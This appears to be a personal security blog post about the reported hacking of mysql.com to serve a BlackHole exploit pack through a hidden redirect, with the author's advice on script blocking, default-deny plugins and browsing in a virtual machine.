I received an alert this afternoon that actually took me by surprise.
A security firm revealed today that mysql.com, the
central repository for widely-used Web database software, was hacked and
booby-trapped to serve visitors with malicious software. The disclosure
caught my eye because just a few days ago I saw evidence that
administrative access to mysql.com was being sold on the hacker
underground for just $3,000.
This wasn’t idiot malware either where people are conned into a dialog box.
Web security firm Armorize stated in its blog that mysql.com was poisoned with a script that invisibly redirects visitors to a Web site that uses the BlackHole exploit pack, an automated exploit toolkit that probes visiting browsers for a variety of known security holes.
“It exploits the visitor’s browsing platform (the browser, the
browser plugins like Adobe Flash, Adobe PDF, etc, Java, …), and upon
successful exploitation, permanently installs a piece of malware into
the visitor’s machine, without the visitor’s knowledge,” say the
researchers. “The visitor doesn’t need to click or agree to anything;
simply visiting mysql.com with a vulnerable browsing platform will
result in an infection.”
This type of exploit is still easily defensible by using the proper browsing plugins, such as no-script, ad-block, and making sure they are a default deny state. Remember that just because you trust a site today doesn’t make it trustworthy tomorrow. Be cautious and be aware. Condition yellow applies to the internet just as it does in reality.
If you can do your web browsing through a VM you might want to do exactly that. I did do that for a long time but eventually laziness won since it didn’t actually get me much in the way of extra security. I’ve seen how easily something can go bad without doing anything questionable. I had malware, which was thankfully caught, that tried to install itself when I clicked to look at a screen shot of an upcoming game on a Google image search.
If you’ve been to MySQL.com recently make sure to check your machine out. I have a feeling this attack was targeted like it did because most of the people who visit that site are likely to have elevated privileges on other systems. While most of those visitors will be security savvy, many also would have likely been trusting due to who the host was.